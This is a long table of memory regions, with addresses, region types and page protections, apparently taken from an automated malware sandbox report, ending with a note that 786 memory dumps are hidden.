trusted library allocation
|
page read and write
|
||
|
1AFF9141000
|
trusted library allocation
|
page read and write
|
||
|
1A5B475F000
|
heap
|
page read and write
|
||
|
166DC45F000
|
heap
|
page read and write
|
||
|
1F198020000
|
trusted library allocation
|
page read and write
|
||
|
1AFF934C000
|
heap
|
page read and write
|
||
|
193E37D000
|
stack
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
9DD2FFA000
|
stack
|
page read and write
|
||
|
1AFF9075000
|
heap
|
page read and write
|
||
|
166DC493000
|
heap
|
page read and write
|
||
|
24E0D27E000
|
heap
|
page read and write
|
||
|
1F197E12000
|
heap
|
page read and write
|
||
|
1F197EF5000
|
heap
|
page read and write
|
||
|
9DD30FB000
|
stack
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
193E77E000
|
stack
|
page read and write
|
||
|
62F000
|
heap
|
page read and write
|
||
|
166DC44E000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1AFDF04E000
|
heap
|
page read and write
|
||
|
1AFF92F2000
|
heap
|
page read and write
|
||
|
18002C000
|
direct allocation
|
page readonly
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
27EE4196000
|
heap
|
page read and write
|
||
|
1AFF0F43000
|
trusted library allocation
|
page read and write
|
||
|
1AFE1BA1000
|
trusted library allocation
|
page read and write
|
||
|
24E0D264000
|
heap
|
page read and write
|
||
|
166DC457000
|
heap
|
page read and write
|
||
|
7FF9F1C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1F197F02000
|
heap
|
page read and write
|
||
|
1F192658000
|
heap
|
page read and write
|
||
|
22C9BE28000
|
heap
|
page read and write
|
||
|
1AFDEF00000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
9DD32F9000
|
stack
|
page read and write
|
||
|
24D1DC73000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
29558330000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9540000
|
trusted library allocation
|
page read and write
|
||
|
27EE411C000
|
heap
|
page read and write
|
||
|
1F197D08000
|
trusted library allocation
|
page read and write
|
||
|
24D1DC63000
|
heap
|
page read and write
|
||
|
27EE36C0000
|
heap
|
page read and write
|
||
|
193E4FA000
|
stack
|
page read and write
|
||
|
1F1937F0000
|
trusted library section
|
page readonly
|
||
|
193DF9F000
|
stack
|
page read and write
|
||
|
166DC470000
|
heap
|
page read and write
|
||
|
27EE36D6000
|
heap
|
page read and write
|
||
|
24E0D24A000
|
heap
|
page read and write
|
||
|
27EE36AC000
|
heap
|
page read and write
|
||
|
24D1DD02000
|
heap
|
page read and write
|
||
|
22CF000
|
stack
|
page read and write
|
||
|
7FF9F1A73000
|
trusted library allocation
|
page execute and read and write
|
||
|
203F000
|
stack
|
page read and write
|
||
|
1F197BE0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9314000
|
heap
|
page read and write
|
||
|
1AFE1BB2000
|
trusted library allocation
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|
||
|
1AFE1FE6000
|
trusted library allocation
|
page read and write
|
||
|
1F193118000
|
heap
|
page read and write
|
||
|
1AFF9510000
|
trusted library allocation
|
page read and write
|
||
|
10007C000
|
stack
|
page read and write
|
||
|
1AFF9150000
|
trusted library allocation
|
page read and write
|
||
|
1A5B4762000
|
heap
|
page read and write
|
||
|
24D1DC52000
|
heap
|
page read and write
|
||
|
27EE417D000
|
heap
|
page read and write
|
||
|
1AFDF280000
|
heap
|
page read and write
|
||
|
667000
|
heap
|
page read and write
|
||
|
1AFF9124000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A1000
|
trusted library allocation
|
page read and write
|
||
|
166DC481000
|
heap
|
page read and write
|
||
|
1AFDF210000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
27EE41AD000
|
heap
|
page read and write
|
||
|
1AFE0B60000
|
heap
|
page execute and read and write
|
||
|
1AFDF250000
|
heap
|
page read and write
|
||
|
1F197D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1CF0000
|
trusted library allocation
|
page read and write
|
||
|
18002D000
|
direct allocation
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
AF15EFE000
|
stack
|
page read and write
|
||
|
166DC42A000
|
heap
|
page read and write
|
||
|
7FFA5248B000
|
unkown
|
page read and write
|
||
|
27EE4602000
|
heap
|
page read and write
|
||
|
1F193102000
|
heap
|
page read and write
|
||
|
7FF9F1CC0000
|
trusted library allocation
|
page read and write
|
||
|
27EE4619000
|
heap
|
page read and write
|
||
|
22C9BE52000
|
heap
|
page read and write
|
||
|
27EE417A000
|
heap
|
page read and write
|
||
|
1AFF92CC000
|
trusted library allocation
|
page read and write
|
||
|
2510000
|
heap
|
page read and write
|
||
|
1AFE1B2A000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92E3000
|
heap
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
1F1926A0000
|
heap
|
page read and write
|
||
|
1F192FD1000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1DF0000
|
trusted library allocation
|
page read and write
|
||
|
1F197EE4000
|
heap
|
page read and write
|
||
|
1AFE0F49000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
166DC320000
|
trusted library allocation
|
page read and write
|
||
|
7FFA52461000
|
unkown
|
page execute read
|
||
|
5E2000
|
heap
|
page read and write
|
||
|
1F192673000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
193E3FE000
|
stack
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1B26000
|
trusted library allocation
|
page read and write
|
||
|
27EE4182000
|
heap
|
page read and write
|
||
|
1F192678000
|
heap
|
page read and write
|
||
|
9DD34FE000
|
stack
|
page read and write
|
||
|
1AFDF1F0000
|
trusted library allocation
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
1A5B4840000
|
heap
|
page read and write
|
||
|
1AFE0B95000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
AF1657E000
|
unkown
|
page read and write
|
||
|
1F192FF0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF94E0000
|
trusted library allocation
|
page read and write
|
||
|
27EE4620000
|
heap
|
page read and write
|
||
|
22C9BE02000
|
heap
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1C21000
|
trusted library allocation
|
page read and write
|
||
|
1AFDEF90000
|
heap
|
page read and write
|
||
|
22C9BE00000
|
heap
|
page read and write
|
||
|
1AFF9322000
|
heap
|
page read and write
|
||
|
1F193100000
|
heap
|
page read and write
|
||
|
1AFF92D0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFE1FDE000
|
trusted library allocation
|
page read and write
|
||
|
1AFF94F0000
|
trusted library allocation
|
page read and write
|
||
|
1F197D44000
|
trusted library allocation
|
page read and write
|
||
|
265F000
|
stack
|
page read and write
|
||
|
29558480000
|
trusted library allocation
|
page read and write
|
||
|
27EE418E000
|
heap
|
page read and write
|
||
|
27EE3702000
|
heap
|
page read and write
|
||
|
7FF9F1D60000
|
trusted library allocation
|
page read and write
|
||
|
1F19269E000
|
heap
|
page read and write
|
||
|
AF164FE000
|
stack
|
page read and write
|
||
|
1A5B4780000
|
heap
|
page read and write
|
||
|
1006F7000
|
stack
|
page read and write
|
||
|
24D1DC5E000
|
heap
|
page read and write
|
||
|
1F197BF0000
|
trusted library allocation
|
page read and write
|
||
|
420000
|
remote allocation
|
page read and write
|
||
|
27EE4602000
|
heap
|
page read and write
|
||
|
7FFA52482000
|
unkown
|
page readonly
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9570000
|
trusted library allocation
|
page read and write
|
||
|
A1C715B000
|
stack
|
page read and write
|
||
|
27EE3E90000
|
remote allocation
|
page read and write
|
||
|
240E000
|
stack
|
page read and write
|
||
|
1AFF9580000
|
trusted library allocation
|
page read and write
|
||
|
27EE4187000
|
heap
|
page read and write
|
||
|
A3A000
|
heap
|
page read and write
|
||
|
7FF9F1D00000
|
trusted library allocation
|
page read and write
|
||
|
193E577000
|
stack
|
page read and write
|
||
|
5563879000
|
stack
|
page read and write
|
||
|
1AFF92D0000
|
trusted library allocation
|
page read and write
|
||
|
1A5B4784000
|
heap
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
5DA000
|
heap
|
page read and write
|
||
|
27EE41AD000
|
heap
|
page read and write
|
||
|
24D1DC61000
|
heap
|
page read and write
|
||
|
1AFF94E0000
|
trusted library allocation
|
page read and write
|
||
|
667000
|
heap
|
page read and write
|
||
|
1F197F06000
|
heap
|
page read and write
|
||
|
193E47F000
|
stack
|
page read and write
|
||
|
27EE3600000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1F192613000
|
heap
|
page read and write
|
||
|
1AFF0EF0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9517000
|
trusted library allocation
|
page read and write
|
||
|
1A5B4764000
|
heap
|
page read and write
|
||
|
22C9BE65000
|
heap
|
page read and write
|
||
|
7FF9F1A8C000
|
trusted library allocation
|
page read and write
|
||
|
556355E000
|
stack
|
page read and write
|
||
|
1F1924F0000
|
heap
|
page read and write
|
||
|
27EE36B0000
|
heap
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1C70000
|
trusted library allocation
|
page read and write
|
||
|
D1D2EF7000
|
stack
|
page read and write
|
||
|
55639FC000
|
stack
|
page read and write
|
||
|
7FF9F1DD0000
|
trusted library allocation
|
page read and write
|
||
|
D1D293F000
|
stack
|
page read and write
|
||
|
27EE4186000
|
heap
|
page read and write
|
||
|
27EE4171000
|
heap
|
page read and write
|
||
|
1AFE1D1A000
|
trusted library allocation
|
page read and write
|
||
|
27EE36E3000
|
heap
|
page read and write
|
||
|
166DC508000
|
heap
|
page read and write
|
||
|
1AFE1B3D000
|
trusted library allocation
|
page read and write
|
||
|
193F48D000
|
stack
|
page read and write
|
||
|
1F193159000
|
heap
|
page read and write
|
||
|
1AFF92A7000
|
trusted library allocation
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
27EE418D000
|
heap
|
page read and write
|
||
|
1AFF92D0000
|
trusted library allocation
|
page read and write
|
||
|
1F192629000
|
heap
|
page read and write
|
||
|
7FF9F1E10000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1C80000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D90000
|
trusted library allocation
|
page read and write
|
||
|
24E0D264000
|
heap
|
page read and write
|
||
|
193E2FD000
|
stack
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|
||
|
1AFF94F0000
|
trusted library allocation
|
page read and write
|
||
|
24E0D202000
|
heap
|
page read and write
|
||
|
29558350000
|
trusted library allocation
|
page read and write
|
||
|
29558380000
|
heap
|
page read and write
|
||
|
27EE417A000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
950000
|
direct allocation
|
page execute and read and write
|
||
|
1AFF9141000
|
trusted library allocation
|
page read and write
|
||
|
24E0D23C000
|
heap
|
page read and write
|
||
|
7FF9F1C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
295583CE000
|
heap
|
page read and write
|
||
|
27EE417D000
|
heap
|
page read and write
|
||
|
24E0D1A0000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
1F198060000
|
remote allocation
|
page read and write
|
||
|
29558160000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
A1C76F9000
|
stack
|
page read and write
|
||
|
7FFA52482000
|
unkown
|
page readonly
|
||
|
1A5B477F000
|
heap
|
page read and write
|
||
|
1AFF9560000
|
trusted library allocation
|
page read and write
|
||
|
24E0D302000
|
heap
|
page read and write
|
||
|
27EE41B1000
|
heap
|
page read and write
|
||
|
1AFF90A6000
|
heap
|
page read and write
|
||
|
1AFF94F0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
166DC45F000
|
heap
|
page read and write
|
||
|
1AFE1FB2000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1A7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27EE4602000
|
heap
|
page read and write
|
||
|
193F24E000
|
stack
|
page read and write
|
||
|
24D1DC29000
|
heap
|
page read and write
|
||
|
1AFE1B73000
|
trusted library allocation
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|
||
|
7FF9F1C12000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1B56000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AFE1D45000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A9000
|
trusted library allocation
|
page read and write
|
||
|
1F197D21000
|
trusted library allocation
|
page read and write
|
||
|
24D1DB80000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92C1000
|
trusted library allocation
|
page read and write
|
||
|
27EE4186000
|
heap
|
page read and write
|
||
|
29558340000
|
trusted library allocation
|
page read and write
|
||
|
24D1DC5F000
|
heap
|
page read and write
|
||
|
166DC500000
|
heap
|
page read and write
|
||
|
62F000
|
heap
|
page read and write
|
||
|
24D1DC3A000
|
heap
|
page read and write
|
||
|
1A5B45E0000
|
heap
|
page read and write
|
||
|
295591F0000
|
heap
|
page readonly
|
||
|
1AFF9550000
|
trusted library allocation
|
page read and write
|
||
|
24D1DD13000
|
heap
|
page read and write
|
||
|
1AFDEFCC000
|
heap
|
page read and write
|
||
|
1F198060000
|
remote allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1A5B476E000
|
heap
|
page read and write
|
||
|
29558290000
|
heap
|
page read and write
|
||
|
1AFF94F0000
|
trusted library allocation
|
page read and write
|
||
|
10017E000
|
stack
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
1F193B60000
|
trusted library allocation
|
page read and write
|
||
|
1F197F06000
|
heap
|
page read and write
|
||
|
63D000
|
heap
|
page read and write
|
||
|
1AFE1AFA000
|
trusted library allocation
|
page read and write
|
||
|
1A5B4751000
|
heap
|
page read and write
|
||
|
27EE417D000
|
heap
|
page read and write
|
||
|
24D1DAF0000
|
heap
|
page read and write
|
||
|
26E0000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
22C9BD10000
|
heap
|
page read and write
|
||
|
193F40E000
|
stack
|
page read and write
|
||
|
1F197E60000
|
trusted library allocation
|
page read and write
|
||
|
9DD35FF000
|
stack
|
page read and write
|
||
|
295583CF000
|
heap
|
page read and write
|
||
|
255B000
|
stack
|
page read and write
|
||
|
27EE4100000
|
heap
|
page read and write
|
||
|
1AFF95A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1F1925A0000
|
trusted library section
|
page read and write
|
||
|
1AFF92A8000
|
trusted library allocation
|
page read and write
|
||
|
1A5B4756000
|
heap
|
page read and write
|
||
|
27EE363C000
|
heap
|
page read and write
|
||
|
27EE3681000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1F198030000
|
trusted library allocation
|
page read and write
|
||
|
1F197D00000
|
trusted library allocation
|
page read and write
|
||
|
5EF1E7F000
|
stack
|
page read and write
|
||
|
7FFA52460000
|
unkown
|
page readonly
|
||
|
193F50C000
|
stack
|
page read and write
|
||
|
7FF9F1B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AFF94E0000
|
trusted library allocation
|
page read and write
|
||
|
24E0D130000
|
heap
|
page read and write
|
||
|
1AFE1AD8000
|
trusted library allocation
|
page read and write
|
||
|
5F0000
|
remote allocation
|
page read and write
|
||
|
2070000
|
remote allocation
|
page read and write
|
||
|
1F19268C000
|
heap
|
page read and write
|
||
|
193DE95000
|
stack
|
page read and write
|
||
|
AF160FE000
|
stack
|
page read and write
|
||
|
9DD347F000
|
stack
|
page read and write
|
||
|
1AFE1BA5000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1A74000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1B2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1009FF000
|
stack
|
page read and write
|
||
|
D1D2FFE000
|
stack
|
page read and write
|
||
|
7FF9F1CD0000
|
trusted library allocation
|
page read and write
|
||
|
27EE4600000
|
heap
|
page read and write
|
||
|
1005FB000
|
stack
|
page read and write
|
||
|
55634DA000
|
stack
|
page read and write
|
||
|
9DD2C7B000
|
stack
|
page read and write
|
||
|
1AFDF1D0000
|
trusted library allocation
|
page read and write
|
||
|
1AFDF200000
|
heap
|
page readonly
|
||
|
1A5B4756000
|
heap
|
page read and write
|
||
|
1AFF0EE1000
|
trusted library allocation
|
page read and write
|
||
|
27EE3530000
|
heap
|
page read and write
|
||
|
7FF9F1DC0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9160000
|
trusted library allocation
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
27EE3713000
|
heap
|
page read and write
|
||
|
166DC400000
|
heap
|
page read and write
|
||
|
9DD37FD000
|
stack
|
page read and write
|
||
|
1AFE1D12000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1DB0000
|
trusted library allocation
|
page read and write
|
||
|
27EE418B000
|
heap
|
page read and write
|
||
|
1AFF9197000
|
heap
|
page execute and read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
24D1DC5D000
|
heap
|
page read and write
|
||
|
1F197B70000
|
trusted library allocation
|
page read and write
|
||
|
1F197E00000
|
heap
|
page read and write
|
||
|
7FF9F1B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
27EE3629000
|
heap
|
page read and write
|
||
|
193E5FC000
|
stack
|
page read and write
|
||
|
1F192600000
|
heap
|
page read and write
|
||
|
1F1936E0000
|
trusted library allocation
|
page read and write
|
||
|
27EE3560000
|
trusted library allocation
|
page read and write
|
||
|
A1C757A000
|
stack
|
page read and write
|
||
|
27EE4185000
|
heap
|
page read and write
|
||
|
7FF9F1CE0000
|
trusted library allocation
|
page read and write
|
||
|
27EE418B000
|
heap
|
page read and write
|
||
|
1A5B4760000
|
heap
|
page read and write
|
||
|
1F192676000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
1AFDF240000
|
heap
|
page execute and read and write
|
||
|
7FF9F1D80000
|
trusted library allocation
|
page read and write
|
||
|
1AFDF084000
|
heap
|
page read and write
|
||
|
24E0D250000
|
heap
|
page read and write
|
||
|
62F000
|
heap
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
1F197EDF000
|
heap
|
page read and write
|
||
|
A1C75F9000
|
stack
|
page read and write
|
||
|
AF1667A000
|
stack
|
page read and write
|
||
|
9DD357F000
|
stack
|
page read and write
|
||
|
1AFDEFED000
|
heap
|
page read and write
|
||
|
1AFF9150000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFDEFD3000
|
heap
|
page read and write
|
||
|
27EE36C7000
|
heap
|
page read and write
|
||
|
1AFE1FC3000
|
trusted library allocation
|
page read and write
|
||
|
27EE4189000
|
heap
|
page read and write
|
||
|
27EE4603000
|
heap
|
page read and write
|
||
|
1A5B48C0000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9302000
|
heap
|
page read and write
|
||
|
1F197E56000
|
heap
|
page read and write
|
||
|
27EE4602000
|
heap
|
page read and write
|
||
|
27EE4189000
|
heap
|
page read and write
|
||
|
27EE41AC000
|
heap
|
page read and write
|
||
|
1AFF95AE000
|
trusted library allocation
|
page read and write
|
||
|
24E0D140000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF90A2000
|
heap
|
page read and write
|
||
|
27EE4152000
|
heap
|
page read and write
|
||
|
1A5B4740000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
166DCC02000
|
trusted library allocation
|
page read and write
|
||
|
27EE4127000
|
heap
|
page read and write
|
||
|
24E0D300000
|
heap
|
page read and write
|
||
|
22C9BF13000
|
heap
|
page read and write
|
||
|
27EE36ED000
|
heap
|
page read and write
|
||
|
166DC220000
|
heap
|
page read and write
|
||
|
24D1DD00000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9500000
|
trusted library allocation
|
page read and write
|
||
|
A1C767E000
|
stack
|
page read and write
|
||
|
1AFDEF70000
|
heap
|
page read and write
|
||
|
1AFF92A1000
|
trusted library allocation
|
page read and write
|
||
|
9E5000
|
heap
|
page read and write
|
||
|
7FF9F1DE0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
1F192702000
|
heap
|
page read and write
|
||
|
1AFF92E0000
|
heap
|
page read and write
|
||
|
1AFDF040000
|
heap
|
page read and write
|
||
|
180000000
|
direct allocation
|
page read and write
|
||
|
AF162F7000
|
stack
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
9DD33FB000
|
stack
|
page read and write
|
||
|
1AFDEFD1000
|
heap
|
page read and write
|
||
|
2090000
|
heap
|
page read and write
|
||
|
1F1926AD000
|
heap
|
page read and write
|
||
|
27EE36AB000
|
heap
|
page read and write
|
||
|
7FF9F1CA9000
|
trusted library allocation
|
page read and write
|
||
|
1AFDF015000
|
heap
|
page read and write
|
||
|
D1D29BF000
|
stack
|
page read and write
|
||
|
29558370000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1FA000
|
stack
|
page read and write
|
||
|
234E000
|
stack
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
5EF22FE000
|
stack
|
page read and write
|
||
|
1007FE000
|
stack
|
page read and write
|
||
|
24D1DC13000
|
heap
|
page read and write
|
||
|
24E0D213000
|
heap
|
page read and write
|
||
|
1AFF9530000
|
trusted library allocation
|
page read and write
|
||
|
24E0D229000
|
heap
|
page read and write
|
||
|
27EE419D000
|
heap
|
page read and write
|
||
|
24E0D28B000
|
heap
|
page read and write
|
||
|
570000
|
direct allocation
|
page execute and read and write
|
||
|
9DD2E77000
|
stack
|
page read and write
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
27EE417F000
|
heap
|
page read and write
|
||
|
193DF1F000
|
stack
|
page read and write
|
||
|
1AFF90D3000
|
heap
|
page read and write
|
||
|
1AFF9590000
|
trusted library allocation
|
page read and write
|
||
|
1AFE1FBA000
|
trusted library allocation
|
page read and write
|
||
|
27EE411E000
|
heap
|
page read and write
|
||
|
1AFDF285000
|
heap
|
page read and write
|
||
|
1AFF92D0000
|
trusted library allocation
|
page read and write
|
||
|
26DF000
|
stack
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
18002E000
|
direct allocation
|
page readonly
|
||
|
1AFE1B45000
|
trusted library allocation
|
page read and write
|
||
|
1F197D0E000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
60D000
|
heap
|
page read and write
|
||
|
1F192FF3000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D20000
|
trusted library allocation
|
page read and write
|
||
|
55635DF000
|
stack
|
page read and write
|
||
|
1AFE1AED000
|
trusted library allocation
|
page read and write
|
||
|
193E27F000
|
stack
|
page read and write
|
||
|
9DD38FA000
|
stack
|
page read and write
|
||
|
24E0DC02000
|
trusted library allocation
|
page read and write
|
||
|
D1D2CFB000
|
stack
|
page read and write
|
||
|
1F192713000
|
heap
|
page read and write
|
||
|
22C9BDA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1C16000
|
trusted library allocation
|
page read and write
|
||
|
27EE41AD000
|
heap
|
page read and write
|
||
|
24E0D24D000
|
heap
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
1F197E20000
|
heap
|
page read and write
|
||
|
295582F9000
|
heap
|
page read and write
|
||
|
24D1DC73000
|
heap
|
page read and write
|
||
|
1F197B60000
|
trusted library allocation
|
page read and write
|
||
|
1004FB000
|
stack
|
page read and write
|
||
|
F9FD87B000
|
stack
|
page read and write
|
||
|
1F197EA9000
|
heap
|
page read and write
|
||
|
22C9C802000
|
trusted library allocation
|
page read and write
|
||
|
D1D30FF000
|
stack
|
page read and write
|
||
|
1AFF9190000
|
heap
|
page execute and read and write
|
||
|
AF163F7000
|
stack
|
page read and write
|
There are 786 hidden memdumps, click here to show them.